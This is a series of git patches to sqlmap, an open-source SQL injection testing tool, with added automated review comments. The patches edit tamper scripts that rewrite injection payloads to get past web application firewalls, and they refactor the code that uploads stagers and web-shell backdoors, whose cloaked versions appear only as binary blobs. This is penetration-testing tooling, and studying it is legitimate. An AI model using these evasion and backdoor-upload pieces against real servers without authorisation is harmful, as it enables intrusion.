 In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions:
 * Each patch should make one logical change.
-* Wrap code to 76 columns when possible.
 * Avoid tabbing, use four blank spaces instead.
 * Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:dev@sqlmap.org).
 * Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected.
diff --git a/lib/core/settings.py b/lib/core/settings.py
index b3eb93948e5..d86411f46a1 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@
 from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.2.5"
+VERSION = "1.2.2.6"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/tamper/appendnullbyte.py b/tamper/appendnullbyte.py
index f7c7d42d8ca..3ea3d30b85a 100644
--- a/tamper/appendnullbyte.py
+++ b/tamper/appendnullbyte.py
@@ -5,12 +5,14 @@
 See the file 'LICENSE' for copying permission
 """
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.LOWEST
 def dependencies():
- pass
+ singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.ACCESS))
 def tamper(payload, **kwargs):
 """
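Review bot: The new `dependencies()` body in appendnullbyte.py calls `os.path.basename(__file__)`, but the hunk only adds the `singleTimeWarnMessage` and `DBMS` imports and no `import os` is visible in the file's import block, so the warning line would raise `NameError` the first time the script is loaded unless `os` is imported somewhere outside the hunk. The same expression is introduced in the commalesslimit.py, concat2concatws.py, modsecurityversioned.py, modsecurityzeroversioned.py, plus2concat.py and plus2fnconcat.py hunks of this commit, and each of those files needs `import os` added to its import block as well. Since the identical `os.path.basename(__file__).split(".")[0]` expression is now copied into seven scripts, a small helper in `lib.core.common` that returns the calling tamper script's name would remove the duplication and the per-file import.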
diff --git a/tamper/base64encode.py b/tamper/base64encode.py
index 1ff2b521823..d2057778b23 100644
--- a/tamper/base64encode.py
+++ b/tamper/base64encode.py
@@ -10,7 +10,7 @@
 from lib.core.enums import PRIORITY
 from lib.core.settings import UNICODE_ENCODING
-__priority__ = PRIORITY.LOWEST
+__priority__ = PRIORITY.LOW
 def dependencies():
 pass
diff --git a/tamper/bluecoat.py b/tamper/bluecoat.py
index 0258f698302..f0f034f39a4 100644
--- a/tamper/bluecoat.py
+++ b/tamper/bluecoat.py
@@ -18,7 +18,7 @@ def dependencies():
 def tamper(payload, **kwargs):
 """
 Replaces space character after SQL statement with a valid random blank character.
- Afterwards replace character = with LIKE operator
+ Afterwards replace character '=' with operator LIKE
 Requirement:
 * Blue Coat SGOS with WAF activated as documented in
diff --git a/tamper/charunicodeescape.py b/tamper/charunicodeescape.py
index 913ea950b48..54c9b86d400 100644
--- a/tamper/charunicodeescape.py
+++ b/tamper/charunicodeescape.py
@@ -9,7 +9,7 @@
 from lib.core.enums import PRIORITY
-__priority__ = PRIORITY.LOWEST
+__priority__ = PRIORITY.NORMAL
 def tamper(payload, **kwargs):
 """
diff --git a/tamper/commalesslimit.py b/tamper/commalesslimit.py
index 636b65710b9..28f8f56af7d 100644
--- a/tamper/commalesslimit.py
+++ b/tamper/commalesslimit.py
@@ -7,12 +7,14 @@
 import re
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.HIGH
 def dependencies():
- pass
+ singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
 def tamper(payload, **kwargs):
 """
diff --git a/tamper/commalessmid.py b/tamper/commalessmid.py
index c0d9feaceb2..395bd03d55b 100644
--- a/tamper/commalessmid.py
+++ b/tamper/commalessmid.py
@@ -9,12 +9,13 @@
 import re
 from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.HIGH
 def dependencies():
- pass
+ singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
 def tamper(payload, **kwargs):
 """
diff --git a/tamper/commentbeforeparentheses.py b/tamper/commentbeforeparentheses.py
index f736a557040..0fdc180e66a 100644
--- a/tamper/commentbeforeparentheses.py
+++ b/tamper/commentbeforeparentheses.py
@@ -9,7 +9,7 @@
 from lib.core.enums import PRIORITY
-__priority__ = PRIORITY.LOW
+__priority__ = PRIORITY.NORMAL
 def dependencies():
 pass
diff --git a/tamper/concat2concatws.py b/tamper/concat2concatws.py
index f59fd350972..f21dc7346d2 100644
--- a/tamper/concat2concatws.py
+++ b/tamper/concat2concatws.py
@@ -5,12 +5,14 @@
 See the file 'LICENSE' for copying permission
 """
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.HIGHEST
 def dependencies():
- pass
+ singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
 def tamper(payload, **kwargs):
 """
diff --git a/tamper/escapequotes.py b/tamper/escapequotes.py
index df6ac57e552..f6f39ecc688 100644
--- a/tamper/escapequotes.py
+++ b/tamper/escapequotes.py
@@ -7,7 +7,7 @@
 from lib.core.enums import PRIORITY
-__priority__ = PRIORITY.LOWEST
+__priority__ = PRIORITY.NORMAL
 def dependencies():
 pass
diff --git a/tamper/informationschemacomment.py b/tamper/informationschemacomment.py
index 4b805d0de04..cec299ed705 100644
--- a/tamper/informationschemacomment.py
+++ b/tamper/informationschemacomment.py
@@ -9,7 +9,7 @@
 from lib.core.enums import PRIORITY
-__priority__ = PRIORITY.LOW
+__priority__ = PRIORITY.NORMAL
 def tamper(payload, **kwargs):
 """
diff --git a/tamper/lowercase.py b/tamper/lowercase.py
index 2d2a93e087c..0723edbdd8e 100644
--- a/tamper/lowercase.py
+++ b/tamper/lowercase.py
@@ -28,7 +28,6 @@ def tamper(payload, **kwargs):
 Notes:
 * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions
- * This tamper script should work against all (?) databases
 >>> tamper('INSERT')
 'insert'
@@ -37,7 +36,7 @@ def tamper(payload, **kwargs):
 retVal = payload
 if payload:
- for match in re.finditer(r"[A-Za-z_]+", retVal):
+ for match in re.finditer(r"\b[A-Za-z_]+\b", retVal):
 word = match.group()
 if word.upper() in kb.keywords:
diff --git a/tamper/modsecurityversioned.py b/tamper/modsecurityversioned.py
index 808667997d1..224cd59f1ae 100644
--- a/tamper/modsecurityversioned.py
+++ b/tamper/modsecurityversioned.py
@@ -6,12 +6,14 @@
 """
 from lib.core.common import randomInt
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.HIGHER
 def dependencies():
- pass
+ singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
 def tamper(payload, **kwargs):
 """
diff --git a/tamper/modsecurityzeroversioned.py b/tamper/modsecurityzeroversioned.py
index 77faed32f30..34ba6a0a5a4 100644
--- a/tamper/modsecurityzeroversioned.py
+++ b/tamper/modsecurityzeroversioned.py
@@ -5,12 +5,14 @@
 See the file 'LICENSE' for copying permission
 """
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.HIGHER
 def dependencies():
- pass
+ singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
 def tamper(payload, **kwargs):
 """
diff --git a/tamper/multiplespaces.py b/tamper/multiplespaces.py
index db83866ebc7..b00a0b1b8c2 100644
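Review bot: The pattern `r"\b[A-Za-z_]+\b"` introduced in the second lowercase.py hunk is repeated verbatim in the multiplespaces.py and randomcase.py hunks of this commit; a single shared constant (for instance in `lib/core/settings.py`, which this series already edits) would keep the three keyword-matching loops from drifting apart. Because `\b` counts digits as word characters, a keyword glued to a digit (constructed example: `SELECT1`) is no longer matched by any of the three scripts, which is presumably the intent but is worth a one-line comment such as `# word boundaries: do not touch keywords embedded in longer identifiers`. The enclosing `tamper()` body starts and ends outside the hunk.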
--- a/tamper/multiplespaces.py
+++ b/tamper/multiplespaces.py
@@ -36,7 +36,7 @@ def tamper(payload, **kwargs):
 if payload:
 words = set()
- for match in re.finditer(r"[A-Za-z_]+", payload):
+ for match in re.finditer(r"\b[A-Za-z_]+\b", payload):
 word = match.group()
 if word.upper() in kb.keywords:
diff --git a/tamper/plus2concat.py b/tamper/plus2concat.py
index e22d0f5905a..f26439dd1a7 100644
--- a/tamper/plus2concat.py
+++ b/tamper/plus2concat.py
@@ -7,13 +7,15 @@
 import re
+from lib.core.common import singleTimeWarnMessage
 from lib.core.common import zeroDepthSearch
+from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.HIGHEST
 def dependencies():
- pass
+ singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL))
 def tamper(payload, **kwargs):
 """
@@ -58,7 +60,7 @@ def tamper(payload, **kwargs):
 retVal = "%sCONCAT(%s)%s" % (retVal[:start], ''.join(chars)[start:end], retVal[end:])
 else:
- match = re.search(r"\((CHAR\(\d+.+CHAR\(\d+\))\)", retVal)
+ match = re.search(r"\((CHAR\(\d+.+\bCHAR\(\d+\))\)", retVal)
 if match:
 part = match.group(0)
 indexes = set(zeroDepthSearch(match.group(1), '+'))
diff --git a/tamper/plus2fnconcat.py b/tamper/plus2fnconcat.py
index d50805dd688..47572d2ccd5 100644
--- a/tamper/plus2fnconcat.py
+++ b/tamper/plus2fnconcat.py
@@ -7,13 +7,15 @@
 import re
+from lib.core.common import singleTimeWarnMessage
 from lib.core.common import zeroDepthSearch
+from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.HIGHEST
 def dependencies():
- pass
+ singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL))
 def tamper(payload, **kwargs):
 """
@@ -64,7 +66,7 @@ def tamper(payload, **kwargs):
 retVal = "%s%s%s)}%s" % (retVal[:start], "{fn CONCAT(" * count, ''.join(chars)[start:end].replace('\x01', ")},"), retVal[end:])
 else:
- match = re.search(r"\((CHAR\(\d+.+CHAR\(\d+\))\)", retVal)
+ match = re.search(r"\((CHAR\(\d+.+\bCHAR\(\d+\))\)", retVal)
 if match:
 part = match.group(0)
 indexes = set(zeroDepthSearch(match.group(1), '+'))
diff --git a/tamper/randomcase.py b/tamper/randomcase.py
index 9f89cc60801..a5fcaf97016 100644
--- a/tamper/randomcase.py
+++ b/tamper/randomcase.py
@@ -40,7 +40,7 @@ def tamper(payload, **kwargs):
 retVal = payload
 if payload:
- for match in re.finditer(r"[A-Za-z_]+", retVal):
+ for match in re.finditer(r"\b[A-Za-z_]+\b", retVal):
 word = match.group()
 if word.upper() in kb.keywords:
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 2a2a5ab74b7..0ba29947853 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-15c5a15fc1c24170aff99c32d2bae75d lib/core/settings.py
+99f9e29606ab1c3f48c822c77d1dc18b lib/core/settings.py
 d0adc28a38e43a787df4471f7f027413 lib/core/shell.py
 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py
 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py
@@ -227,39 +227,39 @@ c3cc8b7727161e64ab59f312c33b541a shell/stagers/stager.aspx_ 3e2e790c370442c3d98eaa88a3523b15 sqlmap.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py -4b1024cecb00f13a4e1be78391e9cedb tamper/appendnullbyte.py -84e6ad0010ed1d9a326d51b493116256 tamper/base64encode.py +5be6e24825d34437512b9021f35ee026 tamper/appendnullbyte.py +0298d81e9dfac7ff18a5236c0f1d84b6 tamper/base64encode.py 55e9fbe57967e57a05a8ca77c312dc70 tamper/between.py -f942ad818d3e26ec34f0d15ca8b84207 tamper/bluecoat.py +e1d2329adc6ca89828a2eaec2951806c tamper/bluecoat.py e3cdf13caedb4682bee3ff8fac103606 tamper/chardoubleencode.py 3b2f68476fbcf8223199e8dd4ec14b64 tamper/charencode.py b502023ac6c48e49e652ba524b8e18cc tamper/charunicodeencode.py -8bc697b143bba852b459806fcfaa5422 tamper/charunicodeescape.py -9e9719d822afab818d6a8a42351baa40 tamper/commalesslimit.py -7f0110c706aca9cd090c0371e6d1a4cb tamper/commalessmid.py -8070799415795bd6f23d11d02b99fbe9 tamper/commentbeforeparentheses.py -6498568524665729cb04a41c5f67f975 tamper/concat2concatws.py +2c2b38974dc773568de7e7d771d7042c tamper/charunicodeescape.py +763aa317d43909a51dd4c2f36834718d tamper/commalesslimit.py +211bb8fa36a6ecb42b719c951c362851 tamper/commalessmid.py +19acfde79c9a2d8458e15182f5b73d71 tamper/commentbeforeparentheses.py +61f895acaaf3dea78e237bdf5fe30a81 tamper/concat2concatws.py dcdc433fe946f1b9005bcd427a951dd6 tamper/equaltolike.py -0a61e7b57ad593202b8449601e757f16 tamper/escapequotes.py +06df880df5d8749963f5562f60fd1637 tamper/escapequotes.py 4393cc5220d2e39c5c9c5a9af4e2635d tamper/greatest.py 25ec62158d3e289bda8a04c8b65686ba tamper/halfversionedmorekeywords.py 9d8c350cbb90d4b21ec9c9db184a213a tamper/htmlencode.py 838212f289632526777b7224bf8aacf9 tamper/ifnull2casewhenisnull.py e2c2b6a67546b36983a72f129a817ec0 tamper/ifnull2ifisnull.py -2416ff8e020fc2db29a580f55dcb6fb1 tamper/informationschemacomment.py +91c92ee203e7e619cb547643883924ca 
tamper/informationschemacomment.py 1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py 2dc49bcd6c55f4e2322b07fa92685356 tamper/least.py -22a740e6fbcb8cc3ada430e3fb1be05f tamper/lowercase.py -e44163d21e055805b5e55667e72f5978 tamper/modsecurityversioned.py -f83a11d594fad3ed3291074c7b37b281 tamper/modsecurityzeroversioned.py -abd6490408551a8c8226a32fbc2b5345 tamper/multiplespaces.py +1834b5409c449d2ea1b70a5038fed9eb tamper/lowercase.py +b7e892fc185927c7eb4a604f87b8b6c1 tamper/modsecurityversioned.py +a15ae5a795661fe992bb476346d54794 tamper/modsecurityzeroversioned.py +b4cadf2ddcdc0598c9a3bf24521a2fa1 tamper/multiplespaces.py be757e4c9a6fb36af7b9a8c444fddb05 tamper/nonrecursivereplacement.py e298e486c06bb39d81f10d61a5c4ceec tamper/overlongutf8more.py b9f698556f8333d9fa6eadaab44a77ab tamper/overlongutf8.py bc0363e4fc04240c9f7b81e4ecce0714 tamper/percentage.py -4fa8b6c0e7573e395330bb6a405abbaf tamper/plus2concat.py -5b947c6cd78eab22ee53f5f534c532d3 tamper/plus2fnconcat.py -44fd1c13a7dd6ae792f11afb28976480 tamper/randomcase.py +b30240804cce482b6ab77714508de89c tamper/plus2concat.py +a8f4a85be6e98b53060b066cd18eed15 tamper/plus2fnconcat.py +e94a1c7e4dc7450ac224436269d823bb tamper/randomcase.py 6368a971a80b1acbbbc6b76616bd96b9 tamper/randomcomments.py 48228322d40d97016b05e408c5234634 tamper/securesphere.py cac8a56f8cc6c14524ee392daa5ae2fd tamper/space2comment.py From e347d90ec56eacfd67ad5302f7c5cc08e2c527d0 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 8 Feb 2018 16:53:46 +0100 Subject: [PATCH 029/428] Minor patch --- lib/core/settings.py | 2 +- shell/README.txt | 4 ++-- txt/checksum.md5 | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index d86411f46a1..2e9adf106b4 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.6" +VERSION = "1.2.2.7" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/shell/README.txt b/shell/README.txt index 6e7f123fec7..77b1c57ee9f 100644 --- a/shell/README.txt +++ b/shell/README.txt @@ -1,7 +1,7 @@ Due to the anti-virus positive detection of shell scripts stored inside this folder, we needed to somehow circumvent this. As from the plain sqlmap users perspective nothing has to be done prior to their usage by sqlmap, but if you want to have access to their original source code use the decrypt functionality of the ../extra/cloak/cloak.py utility. To prepare the original scripts to the cloaked form use this command: -find backdoor.* stager.* -type f -exec python ../extra/cloak/cloak.py -i '{}' \; +find backdoors/backdoor.* stagers/stager.* -type f -exec python ../extra/cloak/cloak.py -i '{}' \; To get back them into the original form use this: -find backdoor.*_ stager.*_ -type f -exec python ../extra/cloak/cloak.py -d -i '{}' \; +find backdoors/backdoor.*_ stagers/stager.*_ -type f -exec python ../extra/cloak/cloak.py -d -i '{}' \; diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 0ba29947853..695778a1c86 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -99f9e29606ab1c3f48c822c77d1dc18b lib/core/settings.py +77b3fc93b10a517a0dde172b13f480c9 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From d813d24c4801bb2c4904a7f5407581700cb06dc9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 8 Feb 2018 16:58:50 +0100 Subject: [PATCH 030/428] Minor update --- lib/core/settings.py | 2 +- shell/backdoors/backdoor.jsp_ | Bin 360 -> 359 bytes txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 2e9adf106b4..741fe3c2766 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.7" +VERSION = "1.2.2.8" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/shell/backdoors/backdoor.jsp_ b/shell/backdoors/backdoor.jsp_ index ef32603bbe9e1f311d0bb202715362cfd9815318..d482c48cc43458d0cb3ca7e4fe68660df4625460 100644 GIT binary patch literal 359 zcmV-t0hs;=oRyL?G<;5PhVS`m9H5XlyNl-mUxIi(u(Wt^;vU_d5?s4BGqSd&^uI*e z5foC2nk-H8&P)(lX7#SY8FYIpB;&%EzZvf)qB9N2p-3L1VH_+N4fJ8`kj;ZE1%AG8 z1|syq_#EiznNLxxR>D_!91r-`pm523!%G=YplqBCBXODWq?ix`z`ANj9MOf1;Ko>* zv@XLdc7o0|Xt)7adH|%ICI(R+eS=hXBzfK1w^^jdY6C^u#tC+=k@tb8Mi3J3h7-rI z^7xnf^g8L(P#pc>w4Rw+Tb2tx@R15fMrDqdzh5sbDtL#Mz_U4cDjd8Mw`xsA%f-G( zl{o1#ESBi7m>wyhd|--15}VLQ`Uu_=>Q0l z5w$5g%@)YK^UOq(j0Kk;@_K?3jJ5&HpYzv4l|@45(3`L>kFlxMdPR5{$mZTPwSU)# zqE`E$-H=X-A9HCSB@00!pr7VR5YVG)oDD->jR{+s5S+(ZRjf%D{W%ZqEjr>?>fmsX z8;EzrmTGq`H!9-#u5J9DUA+xMfp&9IZP-od&c1@0S0llA7i43kxH;Z6)7_fTeoZ(URJA46I)22^T|o1E@iocBW3HPCHeSqb0r9n;?j-B3iq3DlDa%W-fxK>cz! GL+>Z9ZnBX8 diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 695778a1c86..d34a87d3682 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -77b3fc93b10a517a0dde172b13f480c9 lib/core/settings.py +a333cf1cf7e533c13bf1aec774c82938 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py 
@@ -217,7 +217,7 @@ e522c294676ede15bee751107e9bb449 plugins/generic/takeover.py
 1e5532ede194ac9c083891c2f02bca93 plugins/__init__.py
 b04db3e861edde1f9dd0a3850d5b96c8 shell/backdoors/backdoor.asp_
 158bfa168128393dde8d6ed11fe9a1b8 shell/backdoors/backdoor.aspx_
-1add5a9a67539e7fd1999c8c20a69d15 shell/backdoors/backdoor.jsp_
+595f711adf1ecb5f3b9a64532b04d8b9 shell/backdoors/backdoor.jsp_
 09fc3ed6543f4d1885e338b271e5e97a shell/backdoors/backdoor.php_
 0e7aba05423c272f051f31165b0e416d shell/stagers/stager.asp_
 c3cc8b7727161e64ab59f312c33b541a shell/stagers/stager.aspx_
From faaae2b647eb99498845ef9e26e52154495d4549 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Thu, 8 Feb 2018 17:08:44 +0100
Subject: [PATCH 031/428] Minor refactoring

---
 lib/core/settings.py | 6 +++++-
 lib/takeover/web.py | 8 +++++---
 shell/backdoors/backdoor.asp_ | Bin 240 -> 243 bytes
 shell/stagers/stager.asp_ | Bin 1199 -> 1201 bytes
 shell/stagers/stager.aspx_ | Bin 527 -> 529 bytes
 shell/stagers/stager.jsp_ | Bin 1320 -> 1321 bytes
 shell/stagers/stager.php_ | Bin 377 -> 379 bytes
 txt/checksum.md5 | 14 +++++++-------
 8 files changed, 17 insertions(+), 11 deletions(-)

diff --git a/lib/core/settings.py b/lib/core/settings.py
index 741fe3c2766..118286cc652 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@
 from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.2.8"
+VERSION = "1.2.2.9"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@@ -299,6 +299,10 @@
 "wizard",
 )
+# Tags used for value replacements inside shell scripts
+SHELL_WRITABLE_DIR_TAG = "%WRITABLE_DIR%"
+SHELL_RUNCMD_EXE_TAG = "%RUNCMD_EXE%"
+
 # String representation for NULL value
 NULL = "NULL"
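Review bot: The comment above `SHELL_WRITABLE_DIR_TAG = "%WRITABLE_DIR%"` should say where the tag text is bound: it has to match the placeholders embedded in the cloaked `shell/backdoors` and `shell/stagers` files, which this same commit changes only as binary blobs, so a reader of the diff cannot verify that both sides agree. Suggested wording: `# Tags used for value replacements inside shell scripts (must stay in sync with the placeholders inside the cloaked shell/ files)`. Noting that dependency in settings.py also tells the next maintainer that changing either constant requires regenerating the cloaked files.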
diff --git a/lib/takeover/web.py b/lib/takeover/web.py
index 2952a127f0b..2395b06b22b 100644
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -47,6 +47,8 @@
 from lib.core.exception import SqlmapNoneDataException
 from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT
 from lib.core.settings import EVENTVALIDATION_REGEX
+from lib.core.settings import SHELL_RUNCMD_EXE_TAG
+from lib.core.settings import SHELL_WRITABLE_DIR_TAG
 from lib.core.settings import VIEWSTATE_REGEX
 from lib.request.connect import Connect as Request
 from thirdparty.oset.pyoset import oset
@@ -134,7 +136,7 @@ def _webFileStreamUpload(self, stream, destFileName, directory):
 def _webFileInject(self, fileContent, fileName, directory):
 outFile = posixpath.join(ntToP osixSlashes(directory), fileName)
- uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
+ uplQuery = getUnicode(fileContent).replace(SHELL_WRITABLE_DIR_TAG, directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
 query = ""
 if isTechniqueAvailable(kb.technique):
@@ -324,7 +326,7 @@ def webInit(self):
 with open(filename, "w+b") as f:
 _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webApi))
- _ = _.replace("WRITABLE_DIR", utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory))
+ _ = _.replace(SHELL_WRITABLE_DIR_TAG, utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory))
 f.write(_)
 self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)
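Review bot: The expression `directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory` is now written out at both `SHELL_WRITABLE_DIR_TAG` substitution sites, in `_webFileInject` and in `webInit`, while the third substitution in the following `webInit` hunk (`backdoorContent.replace(SHELL_WRITABLE_DIR_TAG, backdoorDirectory)`) does not apply the Windows conversion at all; if `backdoorDirectory` is not already in the expected form that is an inconsistency, and if it is, a comment saying so would help. A small private helper such as `def _shellDirectory(self, directory):` returning the converted path, called from all three sites, would make the behaviour uniform and keep the quoting logic in one place. Both `_webFileInject` and `webInit` start and end outside these hunks.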
@@ -369,7 +371,7 @@ def webInit(self): continue _ = "tmpe%s.exe" % randomStr(lowercase=True) - if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)): + if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace(SHELL_WRITABLE_DIR_TAG, backdoorDirectory).replace(SHELL_RUNCMD_EXE_TAG, _)): self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_EXTRAS_PATH, "runcmd", "runcmd.exe_")) self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName) self.webDirectory = backdoorDirectory diff --git a/shell/backdoors/backdoor.asp_ b/shell/backdoors/backdoor.asp_ index d126faee7dc5a9a89bf0bedd9fd38fc780106cb0..9f9a20586cb42b43b9922e9cec98653d51e8445e 100644 GIT binary patch literal 243 zcmVJoQ00dF~d)9I`{sHkyaO7CB^hRo09;0%qzxvN zR08wGB1%%4_whjLs1mw3L3mFo_%*OCUD!hM1iZr)4gqpQ7$`@Z$I t5{c{;F9gDEJ;WbQZtU~=1M3iejpNV=T=LRMapyrmc@AlN3ykH$+V<3lOIHP{$ZPj z*L|_`2ku4;20Ked=n5K|!NGbLOHdal6%XeR{RhO#%@(OFTJLqH5IdI9_*jzTzbjFS z4XqJCx$CAn{TctF&f2C#uvX~s3*H8PsWG*9azT$50@#n?w_x2*hGCR#xrYWf@x(Ar zYcSYufUm?Wn~5l_zz8d{xV*~530BpEy3f-dzO%?R(?^`T17!GJcgRG45eE4HQh3|| 
